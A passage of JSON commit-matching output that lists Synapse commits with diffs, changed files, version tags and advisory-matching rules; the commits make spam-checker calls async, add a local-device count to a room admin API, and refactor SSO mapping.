"+++ b/synapse/handlers/receipts.py", + "@@ -20,3 +20,2 @@ from synapse.handlers._base import BaseHandler", + " from synapse.types import JsonDict, ReadReceipt, get_domain_from_id", + "-from synapse.util.async_helpers import maybe_awaitable", + "@@ -100,6 +99,4 @@ class ReceiptsHandler(BaseHandler):", + " # Note that the min here shouldn't be relied upon to be accurate.", + "- await maybe_awaitable(", + "- self.hs.get_pusherpool().on_new_receipts(", + "- min_batch_id, max_batch_id, affected_room_ids", + "- )", + "+ await self.hs.get_pusherpool().on_new_receipts(", + "+ min_batch_id, max_batch_id, affected_room_ids", + " )", + "diff --git a/synapse/handlers/register.py b/synapse/handlers/register.py", + "index 0d85fd086..94b5610ac 100644", + "--- a/synapse/handlers/register.py", + "+++ b/synapse/handlers/register.py", + "@@ -189,3 +189,3 @@ class RegistrationHandler(BaseHandler):", + "- result = self.spam_checker.check_registration_for_spam(", + "+ result = await self.spam_checker.check_registration_for_spam(", + " threepid, localpart, user_agent_ips or [],", + "diff --git a/synapse/handlers/room.py b/synapse/handlers/room.py", + "index 82fb72b38..758341894 100644", + "--- a/synapse/handlers/room.py", + "+++ b/synapse/handlers/room.py", + "@@ -360,3 +360,3 @@ class RoomCreationHandler(BaseHandler):", + "- if not self.spam_checker.user_may_create_room(user_id):", + "+ if not await self.spam_checker.user_may_create_room(user_id):", + " raise SynapseError(403, \"You are not permitted to create rooms\")", + "@@ -611,3 +611,3 @@ class RoomCreationHandler(BaseHandler):", + "- if not is_requester_admin and not self.spam_checker.user_may_create_room(", + "+ if not is_requester_admin and not await self.spam_checker.user_may_create_room(", + " user_id", + "diff --git a/synapse/handlers/room_member.py b/synapse/handlers/room_member.py", + "index d85110a35..cb5a29bc7 100644", + "--- a/synapse/handlers/room_member.py", + "+++ b/synapse/handlers/room_member.py", + "@@ -410,3 +410,3 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", + "- if not self.spam_checker.user_may_invite(", + "+ if not await self.spam_checker.user_may_invite(", + " requester.user.to_string(), target.to_string(), room_id", + "diff --git a/synapse/handlers/user_directory.py b/synapse/handlers/user_directory.py", + "index afbebfc20..f263a638f 100644", + "--- a/synapse/handlers/user_directory.py", + "+++ b/synapse/handlers/user_directory.py", + "@@ -83,7 +83,7 @@ class UserDirectoryHandler(StateDeltasHandler):", + " # Remove any spammy users from the results.", + "- results[\"results\"] = [", + "- user", + "- for user in results[\"results\"]", + "- if not self.spam_checker.check_username_for_spam(user)", + "- ]", + "+ non_spammy_users = []", + "+ for user in results[\"results\"]:", + "+ if not await self.spam_checker.check_username_for_spam(user):", + "+ non_spammy_users.append(user)", + "+ results[\"results\"] = non_spammy_users", + "diff --git a/synapse/metrics/background_process_metrics.py b/synapse/metrics/background_process_metrics.py", + "index 658f6ecd7..76b7decf2 100644", + "--- a/synapse/metrics/background_process_metrics.py", + "+++ b/synapse/metrics/background_process_metrics.py", + "@@ -15,3 +15,2 @@", + "-import inspect", + " import logging", + "@@ -27,2 +26,3 @@ from synapse.logging.context import LoggingContext, PreserveLoggingContext", + " from synapse.logging.opentracing import noop_context_manager, start_active_span", + "+from synapse.util.async_helpers import maybe_awaitable", + "@@ -208,8 +208,3 @@ def run_as_background_process(desc: str, func, *args, bg_start_span=True, **kwar", + " with ctx:", + "- result = func(*args, **kwargs)", + "-", + "- if inspect.isawaitable(result):", + "- result = await result", + "-", + "- return result", + "+ return await maybe_awaitable(func(*args, **kwargs))", + " except Exception:", + "diff --git a/synapse/rest/media/v1/storage_provider.py b/synapse/rest/media/v1/storage_provider.py", + "index 18c9ed48d..67f67efde 100644", + "--- a/synapse/rest/media/v1/storage_provider.py", + "+++ b/synapse/rest/media/v1/storage_provider.py", + "@@ -15,3 +15,2 @@", + "-import inspect", + " import logging", + "@@ -23,2 +22,3 @@ from synapse.config._base import Config", + " from synapse.logging.context import defer_to_thread, run_in_background", + "+from synapse.util.async_helpers import maybe_awaitable", + "@@ -93,5 +93,3 @@ class StorageProviderWrapper(StorageProvider):", + " # against improper implementations.", + "- result = self.backend.store_file(path, file_info)", + "- if inspect.isawaitable(result):", + "- return await result", + "+ return await maybe_awaitable(self.backend.store_file(path, file_info))", + " else:", + "@@ -100,5 +98,5 @@ class StorageProviderWrapper(StorageProvider):", + " try:", + "- result = self.backend.store_file(path, file_info)", + "- if inspect.isawaitable(result):", + "- return await result", + "+ return await maybe_awaitable(", + "+ self.backend.store_file(path, file_info)", + "+ )", + " except Exception:", + "@@ -112,5 +110,3 @@ class StorageProviderWrapper(StorageProvider):", + " # against improper implementations.", + "- result = self.backend.fetch(path, file_info)", + "- if inspect.isawaitable(result):", + "- return await result", + "+ return await maybe_awaitable(self.backend.fetch(path, file_info))", + "diff --git a/synapse/server.py b/synapse/server.py", + "index 043810ad3..a198b0eb4 100644", + "--- a/synapse/server.py", + "+++ b/synapse/server.py", + "@@ -620,3 +620,3 @@ class HomeServer(metaclass=abc.ABCMeta):", + " @cache_in_self", + "- def get_spam_checker(self):", + "+ def get_spam_checker(self) -> SpamChecker:", + " return SpamChecker(self)", + "diff --git a/synapse/util/async_helpers.py b/synapse/util/async_helpers.py", + "index 382f0cf3f..9a873c8e8 100644", + "--- a/synapse/util/async_helpers.py", + "+++ b/synapse/util/async_helpers.py", + "@@ -17,2 +17,3 @@", + " import collections", + "+import inspect", + " import logging", + "@@ -21,2 +22,3 @@ from typing import (", + " Any,", + "+ Awaitable,", + " Callable,", + "@@ -544,7 +546,7 @@ class DoneAwaitable:", + "-def maybe_awaitable(value):", + "+def maybe_awaitable(value: Union[Awaitable[R], R]) -> Awaitable[R]:", + " \"\"\"Convert a value to an awaitable if not already an awaitable.", + " \"\"\"", + "-", + "- if hasattr(value, \"__await__\"):", + "+ if inspect.isawaitable(value):", + "+ assert isinstance(value, Awaitable)", + " return value", + "diff --git a/synapse/util/distributor.py b/synapse/util/distributor.py", + "index f73e95393..a6ee9edae 100644", + "--- a/synapse/util/distributor.py", + "+++ b/synapse/util/distributor.py", + "@@ -14,3 +14,2 @@", + " # limitations under the License.", + "-import inspect", + " import logging", + "@@ -21,2 +20,3 @@ from synapse.logging.context import make_deferred_yieldable, run_in_background", + " from synapse.metrics.background_process_metrics import run_as_background_process", + "+from synapse.util.async_helpers import maybe_awaitable", + "@@ -107,6 +107,3 @@ class Signal:", + " try:", + "- result = observer(*args, **kwargs)", + "- if inspect.isawaitable(result):", + "- result = await result", + "- return result", + "+ return await maybe_awaitable(observer(*args, **kwargs))", + " except Exception as e:", + "diff --git a/tests/handlers/test_user_directory.py b/tests/handlers/test_user_directory.py", + "index 98e5af207..647a17cb9 100644", + "--- a/tests/handlers/test_user_directory.py", + "+++ b/tests/handlers/test_user_directory.py", + "@@ -272,3 +272,3 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", + " class AllowAll:", + "- def check_username_for_spam(self, user_profile):", + "+ async def check_username_for_spam(self, user_profile):", + " # Allow all users.", + "@@ -285,3 +285,3 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", + " class BlockAll:", + "- def check_username_for_spam(self, user_profile):", + "+ async def check_username_for_spam(self, user_profile):", + " # All users are spammy." + ], + "changed_files": [ + "changelog.d/8890.feature", + "synapse/events/spamcheck.py", + "synapse/federation/federation_base.py", + "synapse/handlers/auth.py", + "synapse/handlers/directory.py", + "synapse/handlers/federation.py", + "synapse/handlers/message.py", + "synapse/handlers/receipts.py", + "synapse/handlers/register.py", + "synapse/handlers/room.py", + "synapse/handlers/room_member.py", + "synapse/handlers/user_directory.py", + "synapse/metrics/background_process_metrics.py", + "synapse/rest/media/v1/storage_provider.py", + "synapse/server.py", + "synapse/util/async_helpers.py", + "synapse/util/distributor.py", + "tests/handlers/test_user_directory.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8890": "Honour AS ratelimit settings for /login requests #8920 Add type hints to the crypto module #8999" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8890, 8890", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: server, federation", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8890", + "relevance": 2 + } + ] + }, + { + "commit_id": "0a34cdfc6682c2654c745c4d7c2f5ffd1865dbc8", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607683367, + "hunks": 22, + "message": "Add number of local devices to Room Details Admin API (#8886)", + "diff": [ + "diff --git a/changelog.d/8886.feature b/changelog.d/8886.feature", + "new file mode 100644", + "index 000000000..9e446f28b", + "--- /dev/null", + "+++ b/changelog.d/8886.feature", + "@@ -0,0 +1 @@", + "+Add number of local devices to Room Details Admin API. Contributed by @dklimpel.", + "\\ No newline at end of file", + "diff --git a/synapse/rest/admin/rooms.py b/synapse/rest/admin/rooms.py", + "index 25f89e468..b902af802 100644", + "--- a/synapse/rest/admin/rooms.py", + "+++ b/synapse/rest/admin/rooms.py", + "@@ -16,3 +16,3 @@ import logging", + " from http import HTTPStatus", + "-from typing import List, Optional", + "+from typing import TYPE_CHECKING, List, Optional, Tuple", + "@@ -27,2 +27,3 @@ from synapse.http.servlet import (", + " )", + "+from synapse.http.site import SynapseRequest", + " from synapse.rest.admin._base import (", + "@@ -33,3 +34,6 @@ from synapse.rest.admin._base import (", + " from synapse.storage.databases.main.room import RoomSortOrder", + "-from synapse.types import RoomAlias, RoomID, UserID, create_requester", + "+from synapse.types import JsonDict, RoomAlias, RoomID, UserID, create_requester", + "+", + "+if TYPE_CHECKING:", + "+ from synapse.server import HomeServer", + "@@ -47,3 +51,3 @@ class ShutdownRoomRestServlet(RestServlet):", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.hs = hs", + "@@ -52,3 +56,5 @@ class ShutdownRoomRestServlet(RestServlet):", + "- async def on_POST(self, request, room_id):", + "+ async def on_POST(", + "+ self, request: SynapseRequest, room_id: str", + "+ ) -> Tuple[int, JsonDict]:", + " requester = await self.auth.get_user_by_req(request)", + "@@ -88,3 +94,3 @@ class DeleteRoomRestServlet(RestServlet):", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.hs = hs", + "@@ -94,3 +100,5 @@ class DeleteRoomRestServlet(RestServlet):", + "- async def on_POST(self, request, room_id):", + "+ async def on_POST(", + "+ self, request: SynapseRequest, room_id: str", + "+ ) -> Tuple[int, JsonDict]:", + " requester = await self.auth.get_user_by_req(request)", + "@@ -148,3 +156,3 @@ class ListRoomRestServlet(RestServlet):", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.store = hs.get_datastore()", + "@@ -153,3 +161,3 @@ class ListRoomRestServlet(RestServlet):", + "- async def on_GET(self, request):", + "+ async def on_GET(self, request: SynapseRequest) -> Tuple[int, JsonDict]:", + " requester = await self.auth.get_user_by_req(request)", + "@@ -238,3 +246,3 @@ class RoomRestServlet(RestServlet):", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.hs = hs", + "@@ -243,3 +251,5 @@ class RoomRestServlet(RestServlet):", + "- async def on_GET(self, request, room_id):", + "+ async def on_GET(", + "+ self, request: SynapseRequest, room_id: str", + "+ ) -> Tuple[int, JsonDict]:", + " await assert_requester_is_admin(self.auth, request)", + "@@ -250,3 +260,6 @@ class RoomRestServlet(RestServlet):", + "- return 200, ret", + "+ members = await self.store.get_users_in_room(room_id)", + "+ ret[\"joined_local_devices\"] = await self.store.count_devices_by_users(members)", + "+", + "+ return (200, ret)", + "@@ -260,3 +273,3 @@ class RoomMembersRestServlet(RestServlet):", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.hs = hs", + "@@ -265,3 +278,5 @@ class RoomMembersRestServlet(RestServlet):", + "- async def on_GET(self, request, room_id):", + "+ async def on_GET(", + "+ self, request: SynapseRequest, room_id: str", + "+ ) -> Tuple[int, JsonDict]:", + " await assert_requester_is_admin(self.auth, request)", + "@@ -282,3 +297,3 @@ class JoinRoomAliasServlet(RestServlet):", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.hs = hs", + "@@ -289,3 +304,5 @@ class JoinRoomAliasServlet(RestServlet):", + "- async def on_POST(self, request, room_identifier):", + "+ async def on_POST(", + "+ self, request: SynapseRequest, room_identifier: str", + "+ ) -> Tuple[int, JsonDict]:", + " requester = await self.auth.get_user_by_req(request)", + "@@ -316,3 +333,2 @@ class JoinRoomAliasServlet(RestServlet):", + " room_id, remote_room_hosts = await handler.lookup_room_alias(room_alias)", + "- room_id = room_id.to_string()", + " else:", + "diff --git a/synapse/storage/databases/main/devices.py b/synapse/storage/databases/main/devices.py", + "index dfb4f87b8..909767764 100644", + "--- a/synapse/storage/databases/main/devices.py", + "+++ b/synapse/storage/databases/main/devices.py", + "@@ -59,2 +59,34 @@ class DeviceWorkerStore(SQLBaseStore):", + "+ async def count_devices_by_users(self, user_ids: Optional[List[str]] = None) -> int:", + "+ \"\"\"Retrieve number of all devices of given users.", + "+ Only returns number of devices that are not marked as hidden.", + "+", + "+ Args:", + "+ user_ids: The IDs of the users which owns devices", + "+ Returns:", + "+ Number of devices of this users.", + "+ \"\"\"", + "+", + "+ def count_devices_by_users_txn(txn, user_ids):", + "+ sql = \"\"\"", + "+ SELECT count(*)", + "+ FROM devices", + "+ WHERE", + "+ hidden = '0' AND", + "+ \"\"\"", + "+", + "+ clause, args = make_in_list_sql_clause(", + "+ txn.database_engine, \"user_id\", user_ids", + "+ )", + "+", + "+ txn.execute(sql + clause, args)", + "+ return txn.fetchone()[0]", + "+", + "+ if not user_ids:", + "+ return 0", + "+", + "+ return await self.db_pool.runInteraction(", + "+ \"count_devices_by_users\", count_devices_by_users_txn, user_ids", + "+ )", + "+", + " async def get_device(self, user_id: str, device_id: str) -> Dict[str, Any]:", + "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", + "index 46933a049..9c100050d 100644", + "--- a/tests/rest/admin/test_room.py", + "+++ b/tests/rest/admin/test_room.py", + "@@ -1086,2 +1086,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " self.assertIn(\"joined_local_members\", channel.json_body)", + "+ self.assertIn(\"joined_local_devices\", channel.json_body)", + " self.assertIn(\"version\", channel.json_body)", + "@@ -1098,2 +1099,35 @@ class RoomTestCase(unittest.HomeserverTestCase):", + "+ def test_single_room_devices(self):", + "+ \"\"\"Test that `joined_local_devices` can be requested correctly\"\"\"", + "+ room_id_1 = self.helper.create_room_as(self.admin_user, tok=self.admin_user_tok)", + "+", + "+ url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", + "+ request, channel = self.make_request(", + "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "+ )", + "+ self.assertEqual(200, channel.code, msg=channel.json_body)", + "+ self.assertEqual(1, channel.json_body[\"joined_local_devices\"])", + "+", + "+ # Have another user join the room", + "+ user_1 = self.register_user(\"foo\", \"pass\")", + "+ user_tok_1 = self.login(\"foo\", \"pass\")", + "+ self.helper.join(room_id_1, user_1, tok=user_tok_1)", + "+", + "+ url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", + "+ request, channel = self.make_request(", + "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "+ )", + "+ self.assertEqual(200, channel.code, msg=channel.json_body)", + "+ self.assertEqual(2, channel.json_body[\"joined_local_devices\"])", + "+", + "+ # leave room", + "+ self.helper.leave(room_id_1, self.admin_user, tok=self.admin_user_tok)", + "+ self.helper.leave(room_id_1, user_1, tok=user_tok_1)", + "+ url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", + "+ request, channel = self.make_request(", + "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "+ )", + "+ self.assertEqual(200, channel.code, msg=channel.json_body)", + "+ self.assertEqual(0, channel.json_body[\"joined_local_devices\"])", + "+", + " def test_room_members(self):", + "diff --git a/tests/storage/test_devices.py b/tests/storage/test_devices.py", + "index ecb00f4e0..dabc1c5f0 100644", + "--- a/tests/storage/test_devices.py", + "+++ b/tests/storage/test_devices.py", + "@@ -81,2 +81,28 @@ class DeviceStoreTestCase(tests.unittest.TestCase):", + "+ @defer.inlineCallbacks", + "+ def test_count_devices_by_users(self):", + "+ yield defer.ensureDeferred(", + "+ self.store.store_device(\"user_id\", \"device1\", \"display_name 1\")", + "+ )", + "+ yield defer.ensureDeferred(", + "+ self.store.store_device(\"user_id\", \"device2\", \"display_name 2\")", + "+ )", + "+ yield defer.ensureDeferred(", + "+ self.store.store_device(\"user_id2\", \"device3\", \"display_name 3\")", + "+ )", + "+", + "+ res = yield defer.ensureDeferred(self.store.count_devices_by_users())", + "+ self.assertEqual(0, res)", + "+", + "+ res = yield defer.ensureDeferred(self.store.count_devices_by_users([\"unknown\"]))", + "+ self.assertEqual(0, res)", + "+", + "+ res = yield defer.ensureDeferred(self.store.count_devices_by_users([\"user_id\"]))", + "+ self.assertEqual(2, res)", + "+", + "+ res = yield defer.ensureDeferred(", + "+ self.store.count_devices_by_users([\"user_id\", \"user_id2\"])", + "+ )", + "+ self.assertEqual(3, res)", + "+", + " @defer.inlineCallbacks" + ], + "changed_files": [ + "changelog.d/8886.feature", + "synapse/rest/admin/rooms.py", + "synapse/storage/databases/main/devices.py", + "tests/rest/admin/test_room.py", + "tests/storage/test_devices.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8886": "Add number of local devices to Room Details Admin API Awesome-Technologies/synapse-admin#92 ValueError: Attempted to iterate a RoomID #9505" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8886, 8886", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8886", + "relevance": 2 + } + ] + }, + { + "commit_id": "c64002e1c1e95578528e96e3ae87738c4aea1d8a", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607604238, + "hunks": 10, + "message": "Refactor `SsoHandler.get_mxid_from_sso` (#8900) * Factor out _call_attribute_mapper and _register_mapped_user This is mostly an attempt to simplify `get_mxid_from_sso`. * Move mapping_lock down into SsoHandler.", + "diff": [ + "diff --git a/changelog.d/8900.feature b/changelog.d/8900.feature", + "new file mode 100644", + "index 000000000..d450ef499", + "--- /dev/null", + "+++ b/changelog.d/8900.feature", + "@@ -0,0 +1 @@", + "+Add support for allowing users to pick their own user ID during a single-sign-on login.", + "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", + "index 5846f0860..f2ca1ddb5 100644", + "--- a/synapse/handlers/saml_handler.py", + "+++ b/synapse/handlers/saml_handler.py", + "@@ -36,3 +36,2 @@ from synapse.types import (", + " )", + "-from synapse.util.async_helpers import Linearizer", + " from synapse.util.iterutils import chunk_seq", + "@@ -83,5 +82,2 @@ class SamlHandler(BaseHandler):", + "- # a lock on the mappings", + "- self._mapping_lock = Linearizer(name=\"saml_mapping\", clock=self.clock)", + "-", + " self._sso_handler = hs.get_sso_handler()", + "@@ -301,11 +297,10 @@ class SamlHandler(BaseHandler):", + "- with (await self._mapping_lock.queue(self._auth_provider_id)):", + "- return await self._sso_handler.get_mxid_from_sso(", + "- self._auth_provider_id,", + "- remote_user_id,", + "- user_agent,", + "- ip_address,", + "- saml_response_to_remapped_user_attributes,", + "- grandfather_existing_users,", + "- )", + "+ return await self._sso_handler.get_mxid_from_sso(", + "+ self._auth_provider_id,", + "+ remote_user_id,", + "+ user_agent,", + "+ ip_address,", + "+ saml_response_to_remapped_user_attributes,", + "+ grandfather_existing_users,", + "+ )", + "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", + "index e24767b92..112a7d5b2 100644", + "--- a/synapse/handlers/sso.py", + "+++ 